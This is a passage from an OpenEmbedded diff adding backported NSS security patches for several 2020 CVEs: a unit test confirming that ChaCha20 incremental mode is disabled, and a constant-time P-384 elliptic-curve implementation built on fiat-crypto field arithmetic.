b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_2.patch @@ -0,0 +1,80 @@ +From 06b2b1c50bd4eaa7f65d858e5e3f44f678cb3c45 Mon Sep 17 00:00:00 2001 +From: Benjamin Beurdouche +Date: Sat, 18 Jul 2020 00:13:14 +0000 +Subject: [PATCH] Bug 1636771 - Disable PKCS11 incremental mode for ChaCha20. + r=kjacobs,rrelyea + +Depends on D74801 + +Differential Revision: https://phabricator.services.mozilla.com/D83994 + +--HG-- +extra : moz-landing-system : lando +--- + nss/gtests/pk11_gtest/pk11_cipherop_unittest.cc | 49 +++++++++++++++++++++ + nss/lib/softoken/pkcs11c.c | 1 + + 2 files changed, 50 insertions(+) + +CVE: CVE-2020-12403 +Upstream-Status: Backport [https://github.com/nss-dev/nss/commit/06b2b1c50bd4eaa7f65d858e5e3f44f678cb3c45] +Comment: Refreshed path for whole patchset and removed change for pkcs11c.c +Signed-off-by: Ranjitsinh Rathod + +diff --git a/nss/gtests/pk11_gtest/pk11_cipherop_unittest.cc b/nss/gtests/pk11_gtest/pk11_cipherop_unittest.cc +index 38982fd885..700750cc90 100644 +--- a/nss/gtests/pk11_gtest/pk11_cipherop_unittest.cc ++++ b/nss/gtests/pk11_gtest/pk11_cipherop_unittest.cc +@@ -77,4 +77,53 @@ TEST(Pkcs11CipherOp, SingleCtxMultipleUnalignedCipherOps) { + NSS_ShutdownContext(globalctx); + } + ++TEST(Pkcs11CipherOp, SingleCtxMultipleUnalignedCipherOpsChaCha20) { ++ PK11SlotInfo* slot; ++ PK11SymKey* key; ++ PK11Context* ctx; ++ ++ NSSInitContext* globalctx = ++ NSS_InitContext("", "", "", "", NULL, ++ NSS_INIT_READONLY | NSS_INIT_NOCERTDB | NSS_INIT_NOMODDB | ++ NSS_INIT_FORCEOPEN | NSS_INIT_NOROOTINIT); ++ ++ const CK_MECHANISM_TYPE cipher = CKM_NSS_CHACHA20_CTR; ++ ++ slot = PK11_GetInternalSlot(); ++ ASSERT_TRUE(slot); ++ ++ // Use arbitrary bytes for the ChaCha20 key and IV ++ uint8_t key_bytes[32]; ++ for (size_t i = 0; i < 32; i++) { ++ key_bytes[i] = i; ++ } ++ SECItem keyItem = {siBuffer, key_bytes, 32}; ++ ++ uint8_t iv_bytes[16]; ++ for (size_t i = 0; i < 16; i++) { ++ key_bytes[i] = i; ++ } ++ SECItem ivItem = {siBuffer, iv_bytes, 16}; ++ ++ SECItem* param = PK11_ParamFromIV(cipher, &ivItem); ++ ++ key = PK11_ImportSymKey(slot, cipher, PK11_OriginUnwrap, CKA_ENCRYPT, ++ &keyItem, NULL); ++ ctx = PK11_CreateContextBySymKey(cipher, CKA_ENCRYPT, key, param); ++ ASSERT_TRUE(key); ++ ASSERT_TRUE(ctx); ++ ++ uint8_t outbuf[128]; ++ // This is supposed to fail for Chacha20. This is because the underlying ++ // PK11_CipherOp operation is calling the C_EncryptUpdate function for ++ // which multi-part is disabled for ChaCha20 in counter mode. ++ ASSERT_EQ(GetBytes(ctx, outbuf, 7), SECFailure); ++ ++ PK11_FreeSymKey(key); ++ PK11_FreeSlot(slot); ++ SECITEM_FreeItem(param, PR_TRUE); ++ PK11_DestroyContext(ctx, PR_TRUE); ++ NSS_ShutdownContext(globalctx); ++} ++ + } // namespace nss_test diff --git a/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-6829_12400.patch b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-6829_12400.patch new file mode 100644 index 0000000000..5fb9f773a6 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-6829_12400.patch @@ -0,0 +1,19789 @@ + +# HG changeset patch +# User Billy Brumley +# Date 1594909956 0 +# Node ID e55ab3145546ae3cf1333b43956a974675d2d25c +# Parent 688d2a7257586ba8ca7febe46e6ae43c4c1fe04e +Bug 1631583 - ECC: constant time P-384 r=bbeurdouche,rrelyea + +This portable code contributed by the Network and Information Security Group (NISEC) at Tampere University comes from: + +[ECCKiila](https://gitlab.com/nisec/ecckiila) that uses [Fiat](https://github.com/mit-plv/fiat-crypto) for the underlying field arithmetic. + +Co-authored-by: Luis Rivera-Zamarripa +Co-authored-by: Jesús-Javier Chi-Domínguez + +Differential Revision: https://phabricator.services.mozilla.com/D79267 + +Upstream-Status: Backport +https://hg.mozilla.org/projects/nss/raw-rev/e55ab3145546ae3cf1333b43956a974675d2d25c +CVE: CVE-2020-6829 +CVE: CVE-2020-12400 +Signed-off-by Armin Kuster + +diff --git a/nss/lib/freebl/ecl/ecl-priv.h b/nss/lib/freebl/ecl/ecl-priv.h +--- a/nss/lib/freebl/ecl/ecl-priv.h ++++ b/nss/lib/freebl/ecl/ecl-priv.h +@@ -240,11 +240,12 @@ mp_err ec_group_set_gfp256(ECGroup *grou + mp_err ec_group_set_gfp384(ECGroup *group, ECCurveName); + mp_err ec_group_set_gfp521(ECGroup *group, ECCurveName); + mp_err ec_group_set_gf2m163(ECGroup *group, ECCurveName name); + mp_err ec_group_set_gf2m193(ECGroup *group, ECCurveName name); + mp_err ec_group_set_gf2m233(ECGroup *group, ECCurveName name); + + /* Optimized point multiplication */ + mp_err ec_group_set_gfp256_32(ECGroup *group, ECCurveName name); ++mp_err ec_group_set_secp384r1(ECGroup *group, ECCurveName name); + + SECStatus ec_Curve25519_mul(PRUint8 *q, const PRUint8 *s, const PRUint8 *p); + #endif /* __ecl_priv_h_ */ +diff --git a/lib/freebl/ecl/ecl.c b/lib/freebl/ecl/ecl.c +--- a/nss/lib/freebl/ecl/ecl.c ++++ b/nss/lib/freebl/ecl/ecl.c +@@ -159,16 +159,26 @@ construct_ecgroup(const ECCurveName name + &order, cofactor); + if (group == NULL) { + res = MP_UNDEF; + goto CLEANUP; + } + MP_CHECKOK(ec_group_set_gfp256(group, name)); + MP_CHECKOK(ec_group_set_gfp256_32(group, name)); + break; ++ case ECCurve_SECG_PRIME_384R1: ++ group = ++ ECGroup_consGFp(&irr, &curvea, &curveb, &genx, &geny, ++ &order, cofactor); ++ if (group == NULL) { ++ res = MP_UNDEF; ++ goto CLEANUP; ++ } ++ MP_CHECKOK(ec_group_set_secp384r1(group, name)); ++ break; + case ECCurve_SECG_PRIME_521R1: + group = + ECGroup_consGFp(&irr, &curvea, &curveb, &genx, &geny, + &order, cofactor); + if (group == NULL) { + res = MP_UNDEF; + goto CLEANUP; + } +diff --git a/lib/freebl/ecl/ecp_secp384r1.c b/lib/freebl/ecl/ecp_secp384r1.c +new file mode 100644 +--- /dev/null ++++ b/nss/lib/freebl/ecl/ecp_secp384r1.c +@@ -0,0 +1,19668 @@ ++/* Autogenerated: ECCKiila https://gitlab.com/nisec/ecckiila */ ++/*- ++ * MIT License ++ * ++ * Copyright (c) 2020 Luis Rivera-Zamarripa, Jesús-Javier Chi-Domínguez, Billy Bob Brumley ++ * ++ * Permission is hereby granted, free of charge, to any person obtaining a copy ++ * of this software and associated documentation files (the "Software"), to deal ++ * in the Software without restriction, including without limitation the rights ++ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ++ * copies of the Software, and to permit persons to whom the Software is ++ * furnished to do so, subject to the following conditions: ++ * ++ * The above copyright notice and this permission notice shall be included in all ++ * copies or substantial portions of the Software. ++ * ++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ++ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ++ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ++ * SOFTWARE. ++ */ ++#if defined(__SIZEOF_INT128__) && !defined(PEDANTIC) ++ ++#include ++#include ++#define LIMB_BITS 64 ++#define LIMB_CNT 6 ++/* Field elements */ ++typedef uint64_t fe_t[LIMB_CNT]; ++typedef uint64_t limb_t; ++ ++#define fe_copy(d, s) memcpy(d, s, sizeof(fe_t)) ++#define fe_set_zero(d) memset(d, 0, sizeof(fe_t)) ++ ++/* Projective points */ ++typedef struct { ++ fe_t X; ++ fe_t Y; ++ fe_t Z; ++} pt_prj_t; ++ ++/* Affine points */ ++typedef struct { ++ fe_t X; ++ fe_t Y; ++} pt_aff_t; ++ ++/* BEGIN verbatim fiat code https://github.com/mit-plv/fiat-crypto */ ++/*- ++ * MIT License ++ * ++ * Copyright (c) 2020 the fiat-crypto authors (see the AUTHORS file) ++ * ++ * Permission is hereby granted, free of charge, to any person obtaining a copy ++ * of this software and associated documentation files (the "Software"), to deal ++ * in the Software without restriction, including without limitation the rights ++ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ++ * copies of the Software, and to permit persons to whom the Software is ++ * furnished to do so, subject to the following conditions: ++ * ++ * The above copyright notice and this permission notice shall be included in ++ * all copies or substantial portions of the Software. ++ * ++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ++ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ++ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ++ * SOFTWARE. ++ */ ++ ++/* Autogenerated: word_by_word_montgomery --static secp384r1 64 '2^384 - 2^128 - 2^96 + 2^32 - 1' */ ++/* curve description: secp384r1 */ ++/* machine_wordsize = 64 (from "64") */ ++/* requested operations: (all) */ ++/* m = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeffffffff0000000000000000ffffffff (from "2^384 - 2^128 - 2^96 + 2^32 - 1") */ ++/* */ ++/* NOTE: In addition to the bounds specified above each function, all */ ++/* functions synthesized for this Montgomery arithmetic require the */ ++/* input to be strictly less than the prime modulus (m), and also */ ++/* require the input to be in the unique saturated representation. */ ++/* All functions also ensure that these two properties are true of */ ++/* return values. */ ++/* */ ++/* Computed values: */ ++/* eval z = z[0] + (z[1] << 64) + (z[2] << 128) + (z[3] << 192) + (z[4] << 256) + (z[5] << 0x140) */ ++/* bytes_eval z = z[0] + (z[1] << 8) + (z[2] << 16) + (z[3] << 24) + (z[4] << 32) + (z[5] << 40) + (z[6] << 48) + (z[7] << 56) + (z[8] << 64) + (z[9] << 72) + (z[10] << 80) + (z[11] << 88) + (z[12] << 96) + (z[13] << 104) + (z[14] << 112) + (z[15] << 120) + (z[16] << 128) + (z[17] << 136) + (z[18] << 144) + (z[19] << 152) + (z[20] << 160) + (z[21] << 168) + (z[22] << 176) + (z[23] << 184) + (z[24] << 192) + (z[25] << 200) + (z[26] << 208) + (z[27] << 216) + (z[28] << 224) + (z[29] << 232) + (z[30] << 240) + (z[31] << 248) + (z[32] << 256) + (z[33] << 0x108) + (z[34] << 0x110) + (z[35] << 0x118) + (z[36] << 0x120) + (z[37] << 0x128) + (z[38] << 0x130) + (z[39] << 0x138) + (z[40] << 0x140) + (z[41] << 0x148) + (z[42] << 0x150) + (z[43] << 0x158) + (z[44] << 0x160) + (z[45] << 0x168) + (z[46] << 0x170) + (z[47] << 0x178) */ ++ ++#include ++typedef unsigned char fiat_secp384r1_uint1; ++typedef signed char fiat_secp384r1_int1; ++typedef signed __int128 fiat_secp384r1_int128; ++typedef unsigned __int128 fiat_secp384r1_uint128; ++ ++#if (-1 & 3) != 3 ++#error "This code only works on a two's complement system" ++#endif ++ ++/* ++ * The function fiat_secp384r1_addcarryx_u64 is an addition with carry. ++ * Postconditions: ++ * out1 = (arg1 + arg2 + arg3) mod 2^64 ++ * out2 = ⌊(arg1 + arg2 + arg3) / 2^64⌋ ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [0x0 ~> 0xffffffffffffffff] ++ * arg3: [0x0 ~> 0xffffffffffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffffffffffff] ++ * out2: [0x0 ~> 0x1] ++ */ ++static void ++fiat_secp384r1_addcarryx_u64(uint64_t *out1, ++ fiat_secp384r1_uint1 *out2, ++ fiat_secp384r1_uint1 arg1, ++ uint64_t arg2, uint64_t arg3) ++{ ++ fiat_secp384r1_uint128 x1; ++ uint64_t x2; ++ fiat_secp384r1_uint1 x3; ++ x1 = ((arg1 + (fiat_secp384r1_uint128)arg2) + arg3); ++ x2 = (uint64_t)(x1 & UINT64_C(0xffffffffffffffff)); ++ x3 = (fiat_secp384r1_uint1)(x1 >> 64); ++ *out1 = x2; ++ *out2 = x3; ++} ++ ++/* ++ * The function fiat_secp384r1_subborrowx_u64 is a subtraction with borrow. ++ * Postconditions: ++ * out1 = (-arg1 + arg2 + -arg3) mod 2^64 ++ * out2 = -⌊(-arg1 + arg2 + -arg3) / 2^64⌋ ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [0x0 ~> 0xffffffffffffffff] ++ * arg3: [0x0 ~> 0xffffffffffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffffffffffff] ++ * out2: [0x0 ~> 0x1] ++ */ ++static void ++fiat_secp384r1_subborrowx_u64(uint64_t *out1, ++ fiat_secp384r1_uint1 *out2, ++ fiat_secp384r1_uint1 arg1, ++ uint64_t arg2, uint64_t arg3) ++{ ++ fiat_secp384r1_int128 x1; ++ fiat_secp384r1_int1 x2; ++ uint64_t x3; ++ x1 = ((arg2 - (fiat_secp384r1_int128)arg1) - arg3); ++ x2 = (fiat_secp384r1_int1)(x1 >> 64); ++ x3 = (uint64_t)(x1 & UINT64_C(0xffffffffffffffff)); ++ *out1 = x3; ++ *out2 = (fiat_secp384r1_uint1)(0x0 - x2); ++} ++ ++/* ++ * The function fiat_secp384r1_mulx_u64 is a multiplication, returning the full double-width result. ++ * Postconditions: ++ * out1 = (arg1 * arg2) mod 2^64 ++ * out2 = ⌊arg1 * arg2 / 2^64⌋ ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0xffffffffffffffff] ++ * arg2: [0x0 ~> 0xffffffffffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffffffffffff] ++ * out2: [0x0 ~> 0xffffffffffffffff] ++ */ ++static void ++fiat_secp384r1_mulx_u64(uint64_t *out1, uint64_t *out2, ++ uint64_t arg1, uint64_t arg2) ++{ ++ fiat_secp384r1_uint128 x1; ++ uint64_t x2; ++ uint64_t x3; ++ x1 = ((fiat_secp384r1_uint128)arg1 * arg2); ++ x2 = (uint64_t)(x1 & UINT64_C(0xffffffffffffffff)); ++ x3 = (uint64_t)(x1 >> 64); ++ *out1 = x2; ++ *out2 = x3; ++} ++ ++/* ++ * The function fiat_secp384r1_cmovznz_u64 is a single-word conditional move. ++ * Postconditions: ++ * out1 = (if arg1 = 0 then arg2 else arg3) ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [0x0 ~> 0xffffffffffffffff] ++ * arg3: [0x0 ~> 0xffffffffffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffffffffffff] ++ */ ++static void ++fiat_secp384r1_cmovznz_u64(uint64_t *out1, ++ fiat_secp384r1_uint1 arg1, uint64_t arg2, ++ uint64_t arg3) ++{ ++ fiat_secp384r1_uint1 x1; ++ uint64_t x2; ++ uint64_t x3; ++ x1 = (!(!arg1)); ++ x2 = ((fiat_secp384r1_int1)(0x0 - x1) & UINT64_C(0xffffffffffffffff)); ++ x3 = ((x2 & arg3) | ((~x2) & arg2)); ++ *out1 = x3; ++} ++ ++/* ++ * The function fiat_secp384r1_mul multiplies two field elements in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * 0 ≤ eval arg2 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) * eval (from_montgomery arg2)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * arg2: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_mul(uint64_t out1[6], const uint64_t arg1[6], ++ const uint64_t arg2[6]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ uint64_t x7; ++ uint64_t x8; ++ uint64_t x9; ++ uint64_t x10; ++ uint64_t x11; ++ uint64_t x12; ++ uint64_t x13; ++ uint64_t x14; ++ uint64_t x15; ++ uint64_t x16; ++ uint64_t x17; ++ uint64_t x18; ++ uint64_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint64_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint64_t x23; ++ fiat_secp384r1_uint1 x24; ++ uint64_t x25; ++ fiat_secp384r1_uint1 x26; ++ uint64_t x27; ++ fiat_secp384r1_uint1 x28; ++ uint64_t x29; ++ uint64_t x30; ++ uint64_t x31; ++ uint64_t x32; ++ uint64_t x33; ++ uint64_t x34; ++ uint64_t x35; ++ uint64_t x36; ++ uint64_t x37; ++ uint64_t x38; ++ uint64_t x39; ++ uint64_t x40; ++ uint64_t x41; ++ uint64_t x42; ++ uint64_t x43; ++ uint64_t x44; ++ fiat_secp384r1_uint1 x45; ++ uint64_t x46; ++ fiat_secp384r1_uint1 x47; ++ uint64_t x48; ++ fiat_secp384r1_uint1 x49; ++ uint64_t x50; ++ fiat_secp384r1_uint1 x51; ++ uint64_t x52; ++ fiat_secp384r1_uint1 x53; ++ uint64_t x54; ++ uint64_t x55; ++ fiat_secp384r1_uint1 x56; ++ uint64_t x57; ++ fiat_secp384r1_uint1 x58; ++ uint64_t x59; ++ fiat_secp384r1_uint1 x60; ++ uint64_t x61; ++ fiat_secp384r1_uint1 x62; ++ uint64_t x63; ++ fiat_secp384r1_uint1 x64; ++ uint64_t x65; ++ fiat_secp384r1_uint1 x66; ++ uint64_t x67; ++ fiat_secp384r1_uint1 x68; ++ uint64_t x69; ++ uint64_t x70; ++ uint64_t x71; ++ uint64_t x72; ++ uint64_t x73; ++ uint64_t x74; ++ uint64_t x75; ++ uint64_t x76; ++ uint64_t x77; ++ uint64_t x78; ++ uint64_t x79; ++ uint64_t x80; ++ uint64_t x81; ++ fiat_secp384r1_uint1 x82; ++ uint64_t x83; ++ fiat_secp384r1_uint1 x84; ++ uint64_t x85; ++ fiat_secp384r1_uint1 x86; ++ uint64_t x87; ++ fiat_secp384r1_uint1 x88; ++ uint64_t x89; ++ fiat_secp384r1_uint1 x90; ++ uint64_t x91; ++ uint64_t x92; ++ fiat_secp384r1_uint1 x93; ++ uint64_t x94; ++ fiat_secp384r1_uint1 x95; ++ uint64_t x96; ++ fiat_secp384r1_uint1 x97; ++ uint64_t x98; ++ fiat_secp384r1_uint1 x99; ++ uint64_t x100; ++ fiat_secp384r1_uint1 x101; ++ uint64_t x102; ++ fiat_secp384r1_uint1 x103; ++ uint64_t x104; ++ fiat_secp384r1_uint1 x105; ++ uint64_t x106; ++ uint64_t x107; ++ uint64_t x108; ++ uint64_t x109; ++ uint64_t x110; ++ uint64_t x111; ++ uint64_t x112; ++ uint64_t x113; ++ uint64_t x114; ++ uint64_t x115; ++ uint64_t x116; ++ uint64_t x117; ++ uint64_t x118; ++ uint64_t x119; ++ uint64_t x120; ++ fiat_secp384r1_uint1 x121; ++ uint64_t x122; ++ fiat_secp384r1_uint1 x123; ++ uint64_t x124; ++ fiat_secp384r1_uint1 x125; ++ uint64_t x126; ++ fiat_secp384r1_uint1 x127; ++ uint64_t x128; ++ fiat_secp384r1_uint1 x129; ++ uint64_t x130; ++ uint64_t x131; ++ fiat_secp384r1_uint1 x132; ++ uint64_t x133; ++ fiat_secp384r1_uint1 x134; ++ uint64_t x135; ++ fiat_secp384r1_uint1 x136; ++ uint64_t x137; ++ fiat_secp384r1_uint1 x138; ++ uint64_t x139; ++ fiat_secp384r1_uint1 x140; ++ uint64_t x141; ++ fiat_secp384r1_uint1 x142; ++ uint64_t x143; ++ fiat_secp384r1_uint1 x144; ++ uint64_t x145; ++ uint64_t x146; ++ uint64_t x147; ++ uint64_t x148; ++ uint64_t x149; ++ uint64_t x150; ++ uint64_t x151; ++ uint64_t x152; ++ uint64_t x153; ++ uint64_t x154; ++ uint64_t x155; ++ uint64_t x156; ++ uint64_t x157; ++ uint64_t x158; ++ fiat_secp384r1_uint1 x159; ++ uint64_t x160; ++ fiat_secp384r1_uint1 x161; ++ uint64_t x162; ++ fiat_secp384r1_uint1 x163; ++ uint64_t x164; ++ fiat_secp384r1_uint1 x165; ++ uint64_t x166; ++ fiat_secp384r1_uint1 x167; ++ uint64_t x168; ++ uint64_t x169; ++ fiat_secp384r1_uint1 x170; ++ uint64_t x171; ++ fiat_secp384r1_uint1 x172; ++ uint64_t x173; ++ fiat_secp384r1_uint1 x174; ++ uint64_t x175; ++ fiat_secp384r1_uint1 x176; ++ uint64_t x177; ++ fiat_secp384r1_uint1 x178; ++ uint64_t x179; ++ fiat_secp384r1_uint1 x180; ++ uint64_t x181; ++ fiat_secp384r1_uint1 x182; ++ uint64_t x183; ++ uint64_t x184; ++ uint64_t x185; ++ uint64_t x186; ++ uint64_t x187; ++ uint64_t x188; ++ uint64_t x189; ++ uint64_t x190; ++ uint64_t x191; ++ uint64_t x192; ++ uint64_t x193; ++ uint64_t x194; ++ uint64_t x195; ++ uint64_t x196; ++ uint64_t x197; ++ fiat_secp384r1_uint1 x198; ++ uint64_t x199; ++ fiat_secp384r1_uint1 x200; ++ uint64_t x201; ++ fiat_secp384r1_uint1 x202; ++ uint64_t x203; ++ fiat_secp384r1_uint1 x204; ++ uint64_t x205; ++ fiat_secp384r1_uint1 x206; ++ uint64_t x207; ++ uint64_t x208; ++ fiat_secp384r1_uint1 x209; ++ uint64_t x210; ++ fiat_secp384r1_uint1 x211; ++ uint64_t x212; ++ fiat_secp384r1_uint1 x213; ++ uint64_t x214; ++ fiat_secp384r1_uint1 x215; ++ uint64_t x216; ++ fiat_secp384r1_uint1 x217; ++ uint64_t x218; ++ fiat_secp384r1_uint1 x219; ++ uint64_t x220; ++ fiat_secp384r1_uint1 x221; ++ uint64_t x222; ++ uint64_t x223; ++ uint64_t x224; ++ uint64_t x225; ++ uint64_t x226; ++ uint64_t x227; ++ uint64_t x228; ++ uint64_t x229; ++ uint64_t x230; ++ uint64_t x231; ++ uint64_t x232; ++ uint64_t x233; ++ uint64_t x234; ++ uint64_t x235; ++ fiat_secp384r1_uint1 x236; ++ uint64_t x237; ++ fiat_secp384r1_uint1 x238; ++ uint64_t x239; ++ fiat_secp384r1_uint1 x240; ++ uint64_t x241; ++ fiat_secp384r1_uint1 x242; ++ uint64_t x243; ++ fiat_secp384r1_uint1 x244; ++ uint64_t x245; ++ uint64_t x246; ++ fiat_secp384r1_uint1 x247; ++ uint64_t x248; ++ fiat_secp384r1_uint1 x249; ++ uint64_t x250; ++ fiat_secp384r1_uint1 x251; ++ uint64_t x252; ++ fiat_secp384r1_uint1 x253; ++ uint64_t x254; ++ fiat_secp384r1_uint1 x255; ++ uint64_t x256; ++ fiat_secp384r1_uint1 x257; ++ uint64_t x258; ++ fiat_secp384r1_uint1 x259; ++ uint64_t x260; ++ uint64_t x261; ++ uint64_t x262; ++ uint64_t x263; ++ uint64_t x264; ++ uint64_t x265; ++ uint64_t x266; ++ uint64_t x267; ++ uint64_t x268; ++ uint64_t x269; ++ uint64_t x270; ++ uint64_t x271; ++ uint64_t x272; ++ uint64_t x273; ++ uint64_t x274; ++ fiat_secp384r1_uint1 x275; ++ uint64_t x276; ++ fiat_secp384r1_uint1 x277; ++ uint64_t x278; ++ fiat_secp384r1_uint1 x279; ++ uint64_t x280; ++ fiat_secp384r1_uint1 x281; ++ uint64_t x282; ++ fiat_secp384r1_uint1 x283; ++ uint64_t x284; ++ uint64_t x285; ++ fiat_secp384r1_uint1 x286; ++ uint64_t x287; ++ fiat_secp384r1_uint1 x288; ++ uint64_t x289; ++ fiat_secp384r1_uint1 x290; ++ uint64_t x291; ++ fiat_secp384r1_uint1 x292; ++ uint64_t x293; ++ fiat_secp384r1_uint1 x294; ++ uint64_t x295; ++ fiat_secp384r1_uint1 x296; ++ uint64_t x297; ++ fiat_secp384r1_uint1 x298; ++ uint64_t x299; ++ uint64_t x300; ++ uint64_t x301; ++ uint64_t x302; ++ uint64_t x303; ++ uint64_t x304; ++ uint64_t x305; ++ uint64_t x306; ++ uint64_t x307; ++ uint64_t x308; ++ uint64_t x309; ++ uint64_t x310; ++ uint64_t x311; ++ uint64_t x312; ++ fiat_secp384r1_uint1 x313; ++ uint64_t x314; ++ fiat_secp384r1_uint1 x315; ++ uint64_t x316; ++ fiat_secp384r1_uint1 x317; ++ uint64_t x318; ++ fiat_secp384r1_uint1 x319; ++ uint64_t x320; ++ fiat_secp384r1_uint1 x321; ++ uint64_t x322; ++ uint64_t x323; ++ fiat_secp384r1_uint1 x324; ++ uint64_t x325; ++ fiat_secp384r1_uint1 x326; ++ uint64_t x327; ++ fiat_secp384r1_uint1 x328; ++ uint64_t x329; ++ fiat_secp384r1_uint1 x330; ++ uint64_t x331; ++ fiat_secp384r1_uint1 x332; ++ uint64_t x333; ++ fiat_secp384r1_uint1 x334; ++ uint64_t x335; ++ fiat_secp384r1_uint1 x336; ++ uint64_t x337; ++ uint64_t x338; ++ uint64_t x339; ++ uint64_t x340; ++ uint64_t x341; ++ uint64_t x342; ++ uint64_t x343; ++ uint64_t x344; ++ uint64_t x345; ++ uint64_t x346; ++ uint64_t x347; ++ uint64_t x348; ++ uint64_t x349; ++ uint64_t x350; ++ uint64_t x351; ++ fiat_secp384r1_uint1 x352; ++ uint64_t x353; ++ fiat_secp384r1_uint1 x354; ++ uint64_t x355; ++ fiat_secp384r1_uint1 x356; ++ uint64_t x357; ++ fiat_secp384r1_uint1 x358; ++ uint64_t x359; ++ fiat_secp384r1_uint1 x360; ++ uint64_t x361; ++ uint64_t x362; ++ fiat_secp384r1_uint1 x363; ++ uint64_t x364; ++ fiat_secp384r1_uint1 x365; ++ uint64_t x366; ++ fiat_secp384r1_uint1 x367; ++ uint64_t x368; ++ fiat_secp384r1_uint1 x369; ++ uint64_t x370; ++ fiat_secp384r1_uint1 x371; ++ uint64_t x372; ++ fiat_secp384r1_uint1 x373; ++ uint64_t x374; ++ fiat_secp384r1_uint1 x375; ++ uint64_t x376; ++ uint64_t x377; ++ uint64_t x378; ++ uint64_t x379; ++ uint64_t x380; ++ uint64_t x381; ++ uint64_t x382; ++ uint64_t x383; ++ uint64_t x384; ++ uint64_t x385; ++ uint64_t x386; ++ uint64_t x387; ++ uint64_t x388; ++ uint64_t x389; ++ fiat_secp384r1_uint1 x390; ++ uint64_t x391; ++ fiat_secp384r1_uint1 x392; ++ uint64_t x393; ++ fiat_secp384r1_uint1 x394; ++ uint64_t x395; ++ fiat_secp384r1_uint1 x396; ++ uint64_t x397; ++ fiat_secp384r1_uint1 x398; ++ uint64_t x399; ++ uint64_t x400; ++ fiat_secp384r1_uint1 x401; ++ uint64_t x402; ++ fiat_secp384r1_uint1 x403; ++ uint64_t x404; ++ fiat_secp384r1_uint1 x405; ++ uint64_t x406; ++ fiat_secp384r1_uint1 x407; ++ uint64_t x408; ++ fiat_secp384r1_uint1 x409; ++ uint64_t x410; ++ fiat_secp384r1_uint1 x411; ++ uint64_t x412; ++ fiat_secp384r1_uint1 x413; ++ uint64_t x414; ++ uint64_t x415; ++ uint64_t x416; ++ uint64_t x417; ++ uint64_t x418; ++ uint64_t x419; ++ uint64_t x420; ++ uint64_t x421; ++ uint64_t x422; ++ uint64_t x423; ++ uint64_t x424; ++ uint64_t x425; ++ uint64_t x426; ++ uint64_t x427; ++ uint64_t x428; ++ fiat_secp384r1_uint1 x429; ++ uint64_t x430; ++ fiat_secp384r1_uint1 x431; ++ uint64_t x432; ++ fiat_secp384r1_uint1 x433; ++ uint64_t x434; ++ fiat_secp384r1_uint1 x435; ++ uint64_t x436; ++ fiat_secp384r1_uint1 x437; ++ uint64_t x438; ++ uint64_t x439; ++ fiat_secp384r1_uint1 x440; ++ uint64_t x441; ++ fiat_secp384r1_uint1 x442; ++ uint64_t x443; ++ fiat_secp384r1_uint1 x444; ++ uint64_t x445; ++ fiat_secp384r1_uint1 x446; ++ uint64_t x447; ++ fiat_secp384r1_uint1 x448; ++ uint64_t x449; ++ fiat_secp384r1_uint1 x450; ++ uint64_t x451; ++ fiat_secp384r1_uint1 x452; ++ uint64_t x453; ++ uint64_t x454; ++ fiat_secp384r1_uint1 x455; ++ 